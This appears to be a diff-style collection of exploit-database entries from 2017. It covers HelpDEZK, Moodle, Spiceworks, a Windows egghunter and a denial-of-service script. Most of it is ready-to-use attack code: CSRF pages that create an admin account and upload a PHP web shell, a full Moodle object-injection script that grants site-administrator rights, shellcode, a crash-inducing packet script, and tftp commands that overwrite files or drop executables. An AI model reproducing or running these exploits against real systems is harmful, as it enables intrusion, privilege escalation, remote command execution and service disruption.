 # Exploit Title: Multiple CSRF Remote Code Execution Vulnerability on HelpDEZK 1.1.1
 # Date: 05-April-2017
 # Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy
 # Vendor Homepage: http://www.helpdezk.org/
 # Software Link: https://codeload.github.com/albandes/helpdezk/zip/v1.1.1
 # Version: 1.1.1
 # Tested on: Windows Server 2012 Datacenter Evaluation
 # CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 - CRITICAL)# CVE: CVE-2017-7446 and CVE-2017-7447
 I. Background:
 HelpDEZk is a powerfull software that manages requests/incidents. It has all the needed requirements to an efficient workflow management of all processes involved in service execution. This control is done for internal demands and also for outsourced services. HelpDEZk can be used at any company's area, serving as an support to the shared service center concept, beyond the ability to log all the processes and maintain the request's history, it can pass it through many approval levels. HelpDEZk can put together advanced managing resources with an extremely easy use. Simple and intuitive screens make the day-by-day easier for your team, speeding up the procedures and saving up a lot of time. It is developped in objects oriented PHP language, with the MVC architecture and uses the templates system SMARTY. For the javascripts, JQUERY is used. 
 II. Description:
 Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. 
 HelpDEZK have role for type person:
 admin = 1
 user = 2
 operator = 3
 costumer = 4
 partner = 5
 group = 6
 III. Exploit:
 —> The first CSRF Target is: “/admin/home#/person/”
 (Admin - Records - People & Companies)
 The guest (no have account) can make admin privilege with CSRF Remote Code Execution. This is script for make account admin:
 <html>
   <!-- CSRF PoC on insert menu people -->
   <body>
     <form action="http://192.168.228.186/helpdezk-1.1.1/admin/person/insertNatural" method="POST">
       <input type="hidden" name="login" value="testing" />
       <input type="hidden" name="logintype" value=“3” />  <!-- Type Login = 3 (HD) -->
       <input type="hidden" name="password" value="testing" />
       <input type="hidden" name="name" value="testing" />
       <input type="hidden" name="email" value="testing&#64;local&#46;com" /> <!-- e.g: testing@local.com -->
       <input type="hidden" name="company" value="60" />
       <input type="hidden" name="department" value="1" />
       <input type="hidden" name="phone" value="" />
       <input type="hidden" name="branch" value="" />
       <input type="hidden" name="mobile" value="" />
       <input type="hidden" name="country" value="1" />
       <input type="hidden" name="state" value="1" />
       <input type="hidden" name="cpf" value="" />
       <input type="hidden" name="city" value="1" />
       <input type="hidden" name="neighborhood" value="Choose" />
       <input type="hidden" name="zipcode" value="" />
       <input type="hidden" name="typestreet" value="1" />
       <input type="hidden" name="address" value="Choose" />
       <input type="hidden" name="number" value="" />
       <input type="hidden" name="complement" value="" />
       <input type="hidden" name="typeuser" value="1" /> <!-- admin privilege -->
       <input type="hidden" name="location" value="" />
       <input type="hidden" name="vip" value="N" />
       <input type="hidden" name="filladdress" value="N" />
       <input type="hidden" name="dtbirth" value="" />
       <input type="hidden" name="gender" value="M" />
       <input type="hidden" name="time&#95;value" value="" />
       <input type="hidden" name="overtime" value="" />
       <input type="hidden" name="changePassInsert" value="0" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
 </html>
 —> The second CSRF target is: /admin/home#/logos/
 (Admin - Config - Logos)
 If we have minimum low privilege, we can remote code execute to make shell on module logos (Position of Page Header, Login Page and Reports Logo). The HelpDEZK unrestricted file extension but normally access only for admin. 
 If you have low privilege, please choose which one to execute this code (before execute, you shall login into application): 
 <!-- CSRF PoC - Login Page Logo -->
 <html>
   <body>
     <script>
       function submitRequest()
       {
         var xhr = new XMLHttpRequest();
         xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload2", true);
         xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
         xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
         xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1883328331133778598415248998");
         xhr.withCredentials = true;
         var body = "-----------------------------1883328331133778598415248998\r\n" + 
           "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" + 
           "Content-Type: text/php\r\n" + 
           "\r\n" + 
           "\x3c?php\n" + 
           "\n" + 
           "if(isset($_REQUEST[\'cmd\'])){\n" + 
           "        echo \"\x3cpre\x3e\";\n" + 
           "        $cmd = ($_REQUEST[\'cmd\']);\n" + 
           "        system($cmd);\n" + 
           "        echo \"\x3c/pre\x3e\";\n" + 
           "        die;\n" + 
           "}\n" + 
           "\n" + 
           "?\x3e\r\n" + 
           "-----------------------------1883328331133778598415248998--\r\n";
         var aBody = new Uint8Array(body.length);
         for (var i = 0; i < aBody.length; i++)
           aBody[i] = body.charCodeAt(i); 
         xhr.send(new Blob([aBody]));
       }
     </script>
     <form action="#">
       <input type="button" value="Submit request" onclick="submitRequest();" />
     </form>
   </body>
 </html>
 ————
  <!-- CSRF PoC Page Header Logo -->
 <html>
   <body>
     <script>
       function submitRequest()
       {
         var xhr = new XMLHttpRequest();
         xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload", true);
         xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
         xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
         xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------11525671838941487412014811928");
         xhr.withCredentials = true;
         var body = "-----------------------------11525671838941487412014811928\r\n" + 
           "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n" + 
           "Content-Type: text/php\r\n" + 
           "\r\n" + 
           "\x3c?php\n" + 
           "\n" + 
           "if(isset($_REQUEST[\'cmd\'])){\n" + 
           "        echo \"\x3cpre\x3e\";\n" + 
           "        $cmd = ($_REQUEST[\'cmd\']);\n" + 
           "        system($cmd);\n" + 
           "        echo \"\x3c/pre\x3e\";\n" + 
           "        die;\n" + 
           "}\n" + 
           "\n" + 
           "?\x3e\r\n" + 
           "-----------------------------11525671838941487412014811928--\r\n";
         var aBody = new Uint8Array(body.length);
         for (var i = 0; i < aBody.length; i++)
           aBody[i] = body.charCodeAt(i); 
         xhr.send(new Blob([aBody]));
       }
     </script>
     <form action="#">
       <input type="button" value="Submit request" onclick="submitRequest();" />
     </form>
   </body>
 </html>
 ———————
   <!-- CSRF PoC - Reports Logo -->
 <html>
   <body>
     <script>
       function submitRequest()
       {
         var xhr = new XMLHttpRequest();
         xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload3", true);
         xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
         xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
         xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1789373681642463979344317937");
         xhr.withCredentials = true;
         var body = "-----------------------------1789373681642463979344317937\r\n" + 
           "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" + 
           "Content-Type: text/php\r\n" + 
           "\r\n" + 
           "\x3c?php\n" + 
           "\n" + 
           "if(isset($_REQUEST[\'cmd\'])){\n" + 
           "        echo \"\x3cpre\x3e\";\n" + 
           "        $cmd = ($_REQUEST[\'cmd\']);\n" + 
           "        system($cmd);\n" + 
           "        echo \"\x3c/pre\x3e\";\n" + 
           "        die;\n" + 
           "}\n" + 
           "\n" + 
           "?\x3e\r\n" + 
           "-----------------------------1789373681642463979344317937--\r\n";
         var aBody = new Uint8Array(body.length);
         for (var i = 0; i < aBody.length; i++)
           aBody[i] = body.charCodeAt(i); 
         xhr.send(new Blob([aBody]));
       }
     </script>
     <form action="#">
       <input type="button" value="Submit request" onclick="submitRequest();" />
     </form>
   </body>
 </html>
 ————
 If you have executed and success, check your file on:
 http://example.com/helpdezk-1.1.1/app/uploads/logos/
 and PWN ^_^
 http://example.com/helpdezk-1.1.1/app/uploads/logos/login_index.php?cmd=ipconfig
 IV. Thanks to:
 - Alloh SWT
 - MyBoboboy
 - Komunitas IT Auditor & IT Security
 Refer:
 https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
 https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)http://rungga.blogspot.co.id/2017/04/multiple-csrf-remote-code-execution.html
 https://github.com/albandes/helpdezk/issues/2
--- a/platforms/php/webapps/41828.php
+++ b/platforms/php/webapps/41828.php
@ -0,0 +1,134 @@
 # Exploit: Moodle SQL Injection via Object Injection Through User Preferences
 # Date: April 6th, 2017
 # Exploit Author: Marko Belzetski
 # Contact: mbelzetski@protonmail.com
 # Vendor Homepage: https://moodle.org/
 # Version: 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions
 # Tested on: Moodle 3.2 running on php7.0 on Ubuntu 16.04
 # CVE : CVE-2017-2641
 1. Description
 In Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions, any registered user can update any table of the Moodle database via an objection injection through a legacy user preferences setting (Described by Netanel Rubin at http://netanelrub.in/2017/03/20/moodle-remote-code-execution/)
 2. PoC
 Log in as a regular user and note the URL of the Moodle site, the 'MoodleSession' cookie value and the 'sesskey' parameter along with your 'userid' from the page source. Paste these values into the exploit script, fire the script, re-authenticate and you will be the site administrator.
 <?php
 //defining the required classes for our exploit
 namespace gradereport_singleview\local\ui {
    class feedback{   
    }
 }
 namespace {
    class gradereport_overview_external{
 }
 class grade_item{
 }
 class grade_grade{
 }
 // creating a simple httpPost method which requires php-curl
 function httpPost($url, $data, $MoodleSession, $json)
 {
    $curl = curl_init($url);
    $headers = array('Cookie: MoodleSession='.$MoodleSession);
    if($json){
        array_push($headers, 'Content-Type: application/json');
    }else{
        $data =  urldecode(http_build_query($data));
    }
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy
    $response = curl_exec($curl);
    curl_close($curl);
    return $response;
 }
 // creating a simple httpGet method which requires php-curl
 function httpGet($url, $MoodleSession)
 {
    $curl = curl_init($url);
    $headers = array('Cookie: MoodleSession='.$MoodleSession);
    curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy
    $response = curl_exec($curl);
    curl_close($curl);
    return $response;
 }
 function update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){
    //first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need
    $base = new gradereport_overview_external();
    // now we create the feedback object which inherits the vulnerable __tostring() method from its parent
    $fb = new gradereport_singleview\local\ui\feedback();
    //filling the feedback object with the required properties for the exploit to work
    $fb -> grade = new grade_grade();
    $fb -> grade -> grade_item = new grade_item();
    $fb -> grade -> grade_item -> calculation = "[[somestring";
    $fb -> grade -> grade_item -> calculation_normalized = false;
    //setting the table which we want to alter
    $fb -> grade -> grade_item -> table = $table;
    //setting the row id of the row that we want to alter
    $fb -> grade -> grade_item -> id = $rowId;
    //setting the column with the value that we want to insert
    $fb -> grade -> grade_item -> $column = $value;
    $fb -> grade -> grade_item -> required_fields = array($column,'id');
    //creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object
    $arr = array(array($base),$fb);
    //serializing the array
    $value = serialize($arr);
    //we'll set the course_blocks sortorder to 0 so we default to legacy user preference
    $data = array('sesskey' => $sesskey, 'sortorder[]' => 0);
    httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
    //injecting the payload
    $data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value))))));
    httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);
    //getting the frontpage so the payload will activate
    httpGet($url.'/my/', $MoodleSession);
    }
 $url = ''; //url of the Moodle site
 $MoodleSession = '' //your MoodleSession cookie value
 $sesskey = ''; //your sesskey
 $table = "config"; //table to update 
 $rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation
 $column = 'value'; //column name to update, which holds the userid
 $value = 3; // userid to set as 'siteadmins' Probably want to make it your own
 update_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);
 //reset the allversionshash config entry with a sha1 hash so the site reloads its configuration
 $rowId = 375 // row id of 'allversionshash' parameter
 update_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));
 //reset the sortorder so we can see the front page again without the payload triggering
 $data = array('sesskey' => $sesskey, 'sortorder[]' => 1);
 httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
 //force plugincheck so we can access admin panel
 httpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);
 }
 ?>
 3. Solution:
 Upgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19
--- a/platforms/win_x86-64/shellcode/41827.txt
+++ b/platforms/win_x86-64/shellcode/41827.txt
@ -0,0 +1,43 @@
 PUBLIC Win10egghunterx64
 .code
 Win10egghunterx64 PROC
 _start:
    push 7fh
    pop rdi                               ; RDI is nonvolatile, so it will be preserved after syscalls
 _setup:                   
    inc rdi                                ; parameter 1 - lpAddress - counter
    mov r9b,40h                      ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE                           
    pop rsi                                ; Stack alignment before the stack setup
    pop rsi    
    push rdi                            
    push rsp
    pop rdx                                ; pointer to lpAddress
    push 08h                            ; parameter 2 - dwSize 0x8
    push rsp
    pop r8                                ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp 
    mov [rdx+20h],rsp             ; parameter 4 - lpflOldprotect                     
    dec r10                                ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error                              
 _VirtualProtectEx:
    push 50h                            ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family
    pop rax
    syscall
 _rc_check:
    cmp al,01h                            ; check the response for non-allocated memory
    jge _setup
 _end:                                    ; There won't be too many of these eggs in the memory
    mov eax, 042303042h                    ; the egg
    scasd
    jnz _setup
    jmp rdi
 Win10egghunterx64 ENDP
 END
--- a/platforms/windows/dos/41823.py
+++ b/platforms/windows/dos/41823.py
@ -0,0 +1,42 @@
 import socket
 import binascii
 import time
 import struct
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.settimeout(1)
 s.connect(("10.101.0.85", 8400))
 def sr(p=None, r=None):
        if p:
                print "sending %d bytes: %s " % (len(p)/2,p)
                payl = binascii.a2b_hex(p)
                s.send(payl)
        if r:
                data = s.recv(1024*2)
                print "received %d bytes: %s " % (len(data),binascii.b2a_hex(data))
 pkt1  = "0000003800000010000000100000000f00000000000000000000000000000000000000000000000000000000000000010000000000000000" 
 pkt1 += "0000100309000101090000000000ffe80000000800010000"
 pkt1 += "0000000400000004"
 pkt2  = "0000100309000509000000090000ffe800000036"+"00018016"
 pkt2 += "02000000"+"09050009"+"c14d4d0"+"000000000000000003a793102076376642e6578656a231a0200429d750500989796059c16e042"+"fd00b417" 
 pkt3  = "53534c634c6e54"+"01"+"000b"+"77696e323031322d303200"+"03"+"0000000300000001"
 p = "41"*0xd0 
 pkt3 += p
 sr(pkt1,1)
 sr(pkt2,1)
 sr(pkt3,1)
 exit()
 s.close()
--- a/platforms/windows/remote/41825.txt
+++ b/platforms/windows/remote/41825.txt
@ -0,0 +1,104 @@
 [+] Credits: John Page AKA HYP3RLINX	
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/SPICEWORKS-IMPROPER-ACCESS-CONTROL-FILE-OVERWRITE.txt
 [+] ISR: APPARITIONSEC          
 Vendor:
 ==================
 www.spiceworks.com
 Product:
 =================
 Spiceworks - 7.5
 Provides network inventory and monitoring of all the devices on the network by discovering IP-addressable devices.
 It can be configured to provide custom alerts and notifications based on various criteria. it also provides a ticketing system,
 a user portal, an integrated knowledge base, and mobile ticket management.
 Vulnerability Type:
 ==============================================
 Improper Access Control File Overwrite / Upload
 CVE Reference:
 ==============
 CVE-2017-7237
 Security Issue:
 ================
 The Spiceworks TFTP Server, as distributed with Spiceworks Inventory 7.5, allows remote attackers to access the Spiceworks "data\configurations"
 directory by leveraging the unauthenticated nature of the TFTP service for all clients who can reach UDP port 69. This allows remote attackers to
 overwrite files within the Spiceworks configurations directory, if the targeted file name is known or guessed.
 Remote attackers who can reach UDP port 69 can also write/upload arbitrary files to the "data\configurations", this can potentially become a
 Remote Code Execution vulnerability if for example an executable file e.g. EXE, BAT is dropped, then later accessed and run by an unknowing
 Spiceworks user.
 References - released April 3, 2017:
 ====================================
 https://community.spiceworks.com/support/inventory/docs/network-config#security
 Proof:
 =======
 1) Install Spiceworks 
 2) c:\>tftp -i VICTIM-IP PUT someconfig someconfig
 3) Original someconfig gets overwritten
 OR
 Arbitrary file upload
 c:\>tftp -i VICTIM-IP PUT Evil.exe  Evil.exe
 Network Access:
 ===============
 Remote
 Severity:
 =========
 High
 Disclosure Timeline:
 ======================================================================
 Vendor Notification: March 13, 2017
 Sent vendor e.g. POC : March 23, 2017
 Request status : March 30, 2017
 Vendor reply: "We are still working on this" March 30, 2017
 Vendor reply :"Thanks for bringing this to our attention"
 and releases basic security note of issue on website : April 3, 2017
 April 5, 2017  : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).